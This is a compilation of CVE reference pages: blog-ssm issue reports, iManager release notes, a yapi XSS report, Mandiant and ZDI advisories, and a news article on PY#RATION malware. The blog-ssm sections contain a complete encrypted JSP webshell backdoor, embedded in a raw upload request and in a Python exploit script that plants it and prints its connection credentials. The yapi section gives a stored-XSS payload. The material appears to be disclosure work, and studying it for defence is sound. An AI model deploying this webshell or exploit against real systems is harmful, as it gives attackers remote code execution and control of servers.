File Upload Vulnerability found in Rawchen Blog-ssm v1.0 allowing attackers to execute arbitrary commands and gain escalated privileges via the /uploadFileList component.

**Unrestricted Upload of File with Dangerous Type In /uploadFileList****\[Suggested description\]**

blog-ssm v1.0 was found to contain an arbitrary file upload vulnerability via the component /uploadFileList. This vulnerability allows an attacker to escalate privileges and execute arbitrary commands through a crafted file.

**\[Vulnerability Type\]**

Unrestricted Upload of File with Dangerous Type

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:Registered account, username: text123, password: 123456.**

**Step2:Log in to the account you just registered and click "File Management".**

**Step3:Click File Upload, select the Trojan file that has been built in advance, and click Upload.**

**Data Pack**

POST /uploadFileList HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------352203683622881217472510347558
Content-Length: 2854
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/adminFile
Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------352203683622881217472510347558
Content-Disposition: form-data; name="files\[\]"; filename="text.jsp"
Content-Type: application/octet-stream

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte\[\] cb){return super.defineClass(cb, 0, cb.length);} }public byte\[\] x(byte\[\] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte\[\] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class\[\] { byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class\[\] { byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception e2) {}}return value; } public static byte\[\] base64Decode(String bs) throws Exception {Class base64;byte\[\] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte\[\])decoder.getClass().getMethod("decode", new Class\[\] { String.class }).invoke(decoder, new Object\[\] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte\[\])decoder.getClass().getMethod("decodeBuffer", new Class\[\] { String.class }).invoke(decoder, new Object\[\] { bs });} catch (Exception e2) {}}return value; }%><%try{byte\[\] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%\>
-----------------------------352203683622881217472510347558--

**Step4:In /file, click text.jsp to get the URL address of WebShell: http://localhost:8081/upload/file/text.jsp.**

**Step5:Connect to the Trojan via http://localhost:8081/upload/file/text.jsp.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

True

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/23.html

CVE-2022-40035: Unrestricted Upload of File with Dangerous Type In /uploadFileList · Issue #3 · rawchen/blog-ssm

An issue was discovered in Rawchen blog-ssm v1.0 allows an attacker to obtain sensitive user information by bypassing permission checks via the /adminGetUserList component.

**Improper Authorization In /adminGetUserList****\[Suggested description\]**

blog-ssm v1.0 was found to contain an unauthorized access vulnerability through the component /adminGetUserList. This vulnerability allows an attacker to obtain sensitive user information by bypassing permission checks.

**\[Vulnerability Type\]**

Improper Authorization of Index Containing Sensitive Information

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:After a code audit, it was found that /adminGetUserList had unauthorized access and exported sensitive user information, such as account names and passwords.**

**Step2:Registered account, username: text123, password: 123456.**

**Step3:Log in to the account you just registered and access /adminGetUserList to obtain sensitive information such as password.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

False

**\[Reference(s)\]**

https://cwe.mitre.org/data/definitions/285.html

CVE-2022-40036: Improper Authorization In /adminGetUserList · Issue #5 · rawchen/blog-ssm

An issue discovered in Rawchen blog-ssm v1.0 allows remote attacker to escalate privileges and execute arbitrary commands via the component /upFile.

**Unrestricted Upload of File with Dangerous Type In /upFile****\[Suggested description\]**

blog-ssm v1.0 was found to contain an arbitrary file upload vulnerability via the component /upFile. This vulnerability allows an attacker to escalate privileges and execute arbitrary commands through a crafted file.

**\[Vulnerability Type\]**

Unrestricted Upload of File with Dangerous Type

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:After a code audit, it was found that /upFile has unauthorized access and arbitrary file uploads.**

**Step2:Build EXP according to the code audit results, and run it to get the URL address of WebShell: http://localhost:8081/upload/blog/20220901/1662015136678.jsp**

**EXP:**

import requests

\# Configure the target URL.
Host \= "localhost:8081"
Path \= "upFile"
Url \= "http://{Host}/{Path}".format(Host\=Host, Path\=Path)
\# Configure Headers.
Headers \= {"sec-ch-ua-mobile": "?0",
           "sec-ch-ua-platform": "\\"Windows\\"",
           "Upgrade-Insecure-Requests": "1",
           "Origin": "http://{Host}".format(Host\=Host),
           "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNOyNFd8trb922Qzd",
           "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                         "Chrome/104.0.0.0 Safari/537.36",
           "Connection": "close"}
\# Configure Data, where the WebShell key is KEY, the password is Pass, the payload is JavaDynamicPayload,
\# and the encryptor is JAVA\_AES\_BASE64.
Data \= "------WebKitFormBoundaryNOyNFd8trb922Qzd\\r\\nContent-Disposition: form-data; name=\\"editormd-image-file\\"; " \\
       "filename=\\"text.jsp\\"\\r\\n" \\
       "Content-Type: image/jpeg\\r\\n\\r\\n" \\
       "<%! String xc=\\"3c6e0b8a9c15224a\\"; String pass=\\"pass\\"; String md5=md5(pass+xc); class X extends " \\
       "ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte\[\] cb){return super.defineClass(cb, 0, " \\
       "cb.length);} }public byte\[\] x(byte\[\] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(" \\
       "\\"AES\\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\\"AES\\"));return c.doFinal(s); }catch " \\
       "(Exception e){return null; }} public static String md5(String s) {String ret = null;try {" \\
       "java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\\"MD5\\");m.update(s.getBytes(), 0, " \\
       "s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {" \\
       "}return ret; } public static String base64Encode(byte\[\] bs) throws Exception {Class base64;String value = " \\
       "null;try {base64=Class.forName(\\"java.util.Base64\\");Object Encoder = base64.getMethod(\\"getEncoder\\", " \\
       "null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\\"encodeToString\\", new Class\[\] { " \\
       "byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception e) {try { base64=Class.forName(" \\
       "\\"sun.misc.BASE64Encoder\\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass(" \\
       ").getMethod(\\"encode\\", new Class\[\] { byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception " \\
       "e2) {}}return value; } public static byte\[\] base64Decode(String bs) throws Exception {Class base64;byte\[\] " \\
       "value = null;try {base64=Class.forName(\\"java.util.Base64\\");Object decoder = base64.getMethod(" \\
       "\\"getDecoder\\", null).invoke(base64, null);value = (byte\[\])decoder.getClass().getMethod(\\"decode\\", " \\
       "new Class\[\] { String.class }).invoke(decoder, new Object\[\] { bs });} catch (Exception e) {try { " \\
       "base64=Class.forName(\\"sun.misc.BASE64Decoder\\"); Object decoder = base64.newInstance(); value = (byte\[" \\
       "\])decoder.getClass().getMethod(\\"decodeBuffer\\", new Class\[\] { String.class }).invoke(decoder, new Object\[\] { " \\
       "bs });} catch (Exception e2) {}}return value; }%><%try{byte\[\] data=base64Decode(request.getParameter(" \\
       "pass));data=x(data, false);if (session.getAttribute(\\"payload\\")==null){session.setAttribute(\\"payload\\"," \\
       "new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\\"parameters\\"," \\
       "data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((" \\
       "Class)session.getAttribute(\\"payload\\")).newInstance();f.equals(arrOut);f.equals(" \\
       "pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(" \\
       "base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (" \\
       "Exception e){}\\r\\n%>\\r\\n" \\
       "------WebKitFormBoundaryNOyNFd8trb922Qzd--\\r\\n"
response \= requests.post(Url, headers\=Headers, data\=Data)
\# Output WebShell address and connection information.
Path \= response.json()\['url'\]
Url \= "http://{Host}{Path}".format(Host\=Host, Path\=Path)
print("Web\_Shell\_Url:{Url}".format(Url\=Url))
print("Web\_Shell\_Key:{Key}".format(Key\="key"))
print("Web\_Shell\_Pass:{Pass}".format(Pass\="pass"))
print("Web\_Shell\_Payload:{Payload}".format(Payload\="JavaDynamicPayload"))
print("Web\_Shell\_Encryptor:{Encryptor}".format(Encryptor\="JAVA\_AES\_BASE64"))

**Step3:Connect to the Trojan via http://localhost:8081/upload/blog/20220901/1662015136678.jsp.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

True

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/23.html

CVE-2022-40037: Unrestricted Upload of File with Dangerous Type In /upFile · Issue #2 · rawchen/blog-ssm

An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.

CVE-2022-38775: Security issues

Cross-site Scripting (XSS) vulnerability in NetIQ iManager prior to version 3.2.6 allows attacker to execute malicious scripts on the user's browser. This issue affects: Micro Focus NetIQ iManager NetIQ iManager versions prior to 3.2.6 on ALL.

February 2022

NetIQ iManager 3.2 SP6 resolves previous issues. Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure our products meet all your needs. You can post feedback in the iManager Community Support Forums, our community Web site that also includes product notifications, blogs, and product user groups.

For a full list of all issues resolved in NetIQ iManager 3.x, including all patches and service packs, refer to TID 7016795, “History of Issues Resolved in NetIQ iManager 3.x”.

For more information about this release and for the latest release notes, see the iManager Documentation Web site. To download this product, see the Software License and Download portal.

*   What’s New
    
*   System Requirements
    
*   Installing or Upgrading
    
*   Known Issues
    
*   Legal Notice
    

**1.0 What’s New**

iManager 3.2 SP6 provides the following enhancements and fixes in this release:

*   Operating System Support
    
*   Updates for Dependent Components
    
*   Fixed Issues
    

**1.1 Operating System Support**

In addition to the platforms supported in previous releases of iManager, this release adds support for the following:

*   Red Hat Enterprise Linux (RHEL) 8.5
    
*   Windows Server 2022
    

**1.2 Updates for Dependent Components**

This release adds support for the following third-party components:

*   Azul Zulu 1.8.0\_312
    
*   Apache Tomcat 9.0.55-1
    
*   OpenSSL 1.0.2za
    
*   Log4j 2.17.1
    

**1.3 Fixed Issues**

This release includes the following software fixes that resolve several previous issues:

**Resolved Security Vulnerabilities**

This version of iManager resolves security vulnerability CVE-2021-38134. Special thanks to Kajetan Rostojek for responsibly disclosing the information about CVE-2022-38758 to us.

**Occasional Delay When Loading Pages on the iManager User Interface After Upgrading to iManager 3.2.5**

_Fix:_ With the latest version of Tomcat 9.0.55-1 bundled with iManager 3.2.6, there is no longer any delay while loading the pages on the iManager User Interface.(Defect 440043)

**Connection Timeout Issue Seen When Modifying Directory Objects or Using Plug-Ins**

_Fix:_ With the latest version of Tomcat 9.0.55-1 bundled with iManager 3.2.6, there is no longer any delay while navigating the pages or browsing objects on the iManager User Interface. (Defect 448035)

**2.0 System Requirements**

For information about prerequisites, computer requirements, installation, upgrade or migration, see Planning to Install iManager in the NetIQ iManager Installation Guide.

_NOTE:_iManager uses the modified version of XULRunner on Windows. The source code for the modified XULRunner is available under the Mozilla Public License version 2.0. If you need further assistance with any issue, contact Technical Support.

**3.0 Installing or Upgrading**

To upgrade to iManager 3.2 SP6, you need to be on iManager 2.7.7 P11 or higher.

For more information on upgrading to iManager 3.2 SP6, see the NetIQ iManager Installation Guide.

IMPORTANT:

*   This version of iManager supports only eDirectory 9.2.6 or above when both are installed on the same machine. If you are upgrading iManager 2.7.7 P11 to 3.2 SP6, ensure that your eDirectory is also upgraded to 9.2.6 before upgrading iManager.
    
*   When you install or upgrade to iManager 3.2 SP6, a new imanager\_logging.xml file is created that includes the latest log4j 2.17.1 capabilities. During the upgrade process, the existing imanager\_logging.xml file is replaced with a new one. As a result, the previous audit settings are lost. To allow auditing for iManager events, you must configure the audit settings again in the new imanager\_logging.xml file after the upgrade. Make sure to take a backup of the existing file in a different location before performing the upgrade. For more information, see Auditing iManager Events in the NetIQ iManager Administration Guide.
    

**4.0 Known Issues**

NetIQ Corporation strives to ensure our products provide quality solutions for your enterprise software needs. There are no new issues other than the issues mentioned in the NetIQ iManager 3.2 SP5 Release Notes. If you need further assistance with any issue, please contact Technical Support.

**4.1 iManager Workstation Does Not Work on SLED 12 SP3, SLED 15, OpenSUSE Leap 42.3, OpenSUSE 13.2, and Onward**

_Workaround:_ To workaround this issue, launch iManager using the iManager.sh command and access the workstation through another browser via the URL: http://localhost:8080/nps. The port number can differ. You can find the port number in the iManager.log file located at <extracted\_directory>/imanager/bin/iManager.log location.

**5.0 Legal Notice**

For information about legal notices, trademarks, disclaimers, warranties, export and other use restrictions, U.S. Government rights, patent policy, and FIPS compliance, see https://www.netiq.com/company/legal/.

Copyright © 2022 NetIQ Corporation, a Micro Focus company. All Rights Reserved.

CVE-2022-38758: NetIQ iManager 3.2 Service Pack 6 Release Notes

Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page.

**版本号**

~ 1.9.1

**什么问题**

~Stored XSS in remarks of the interface

**如何复现此问题**

~ Demo: https://yapi.baidu.com

1.  Create a group after login:  
    
2.  Then create a new project:  
    
3.  Enter the project, and add an interface:  
    
4.  After adding successfully, enter the interface edit page:  
    
5.  Scroll down to the remark module. Insert the payload:  
    <? =><video src=x onerror=alert(document.domain)>  
    
6.  After saving, return to the group. Click on the member list and add the username we want to attack. (There is no need for confirmation from the target user, as long as the user name is correct, the target user can be added to the project. Here we use another account to test.)  
    
7.  After the victim logged into the system, he found that he was added to a group:  
    
8.  He entered the group, viewed the project interface, entered the edit page, and triggered the XSS Payload inserted by the attacker.  
    

**什么浏览器**

~ Firefox Chrome

**什么系统（Linux, Windows, macOS）**

macOS

CVE-2021-36686: Stored XSS in remarks of the interface · Issue #2190 · YMFE/yapi

Qlik NPrinting Designer through 21.14.3.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0002****Description**

Qlik NPrinting Designer for Windows contains a local privilege escalation vulnerability which affected version 21.14.3.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41988

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Service Release 2. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Nov 11, 2022.
*   11-Nov-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41988

CVE-2021-41988: Vulnerability-Disclosures/MNDT-2023-0002.md at master · mandiant/Vulnerability-Disclosures

Qlik QlikView through 12.60.20100.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0001****Description**

Qlik QlikView for Windows contains a local privilege escalation vulnerability which affected version 12.60.20100.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41989

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Initial Release to Service Release 1. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Oct 5, 2022.
*   05-Oct-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41989

CVE-2021-41989: Vulnerability-Disclosures/MNDT-2023-0001.md at master · mandiant/Vulnerability-Disclosures

By Deeba Ahmed
Dubbed PY#RATION by researchers; the new Python malware is equipped with RAT behaviour and info-stealing capabilities.
This is a post from HackRead.com Read the original post: New Python Malware Targeting Windows Devices

The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.

Threat analysis firm Securonix’s cybersecurity researchers have discovered a new malware dubbed PY#RATION allowing attackers to steal sensitive files and log keystrokes from impacted devices.

**Malware Distribution Technique**

The malware is distributed through a conventional phishing mechanism in which the email contains a password-protected ZIP archive. When it is unpacked, two shortcut image files appear, titled front.jpg.lkn and back.jpg.lnk. When launched, these files display the front and back of a driver’s license that doesn’t exist.

Images used in the scam (Credit: Securonix)

With this, the malicious code is also executed, leading to two new files being downloaded from the internet. These files are titled front.txt and back.txt, later renamed to .bat docs and executed. The malware disguises itself as Cortana virtual assistant to ensure persistence on the system.

**What is PY#RATION**

PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.

However, the unique aspect is that it uses WebSocket for exfiltration and C2 communication, and evades detection from network security solutions and antivirus programs. Leveraging Python’s built-in Socket.IO framework that facilitates client and server WebSocket communications, the malware pulls data and gets commands over a single TCP connection through open ports simultaneously.

Moreover, according to a blog post published by Securonix, the attackers use the same C2 address, which the IPVoid checking system is yet to block. Researchers believe this malware is still under active development as they have detected multiple versions since August 2022. The malware receives instructions from the operations through WebSocket and obtains sensitive data.

**Potential Dangers**

This Python RAT is packed into an executable that uses automated packers such as ‘pyinstaller’ and ‘py2exe’ to convert Python code into Windows executables. This helps inflate payload size (The first detected version 1.0 being 14MB and the last detected version 1.6.0 being 32 MB containing 1000+ lines and additional code).

Infection chain of the PY#RATION python malware (Credit: Securonix)

Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.

The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Who’s behind this campaign, the distribution volume, and campaign objectives are still unclear.

1.  Malicious PyPI Packages Dropping Malware
2.  6 official Python repositories plagued with malware
3.  Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware
4.  Hackers hit malware authors with malicious NPM packages
5.  Developers Beware: Packages Swapping Crypto Addresses

New Python Malware Targeting Windows Devices

This vulnerability allows local attackers to escalate privileges on affected installations of Windscribe. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16859.

September 26th, 2022

**Windscribe Uncontrolled Search Path Element Local Privilege Escalation Vulnerability****ZDI-22-1300  
ZDI-CAN-16859**

CVE ID

CVE-2022-41141

CVSS SCORE

7.8, (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Windscribe  

AFFECTED PRODUCTS

Windscribe  

VULNERABILITY DETAILS

This vulnerability allows local attackers to escalate privileges on affected installations of Windscribe. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.  

ADDITIONAL DETAILS

Windscribe has issued an update to correct this vulnerability. More details can be found at:  
https://windscribe.com/changelog/windows  

DISCLOSURE TIMELINE

*   2022-03-17 - Vulnerability reported to vendor
*   2022-09-26 - Coordinated public release of advisory

CREDIT

Xavier DANEST  

BACK TO ADVISORIES

Tag

#windows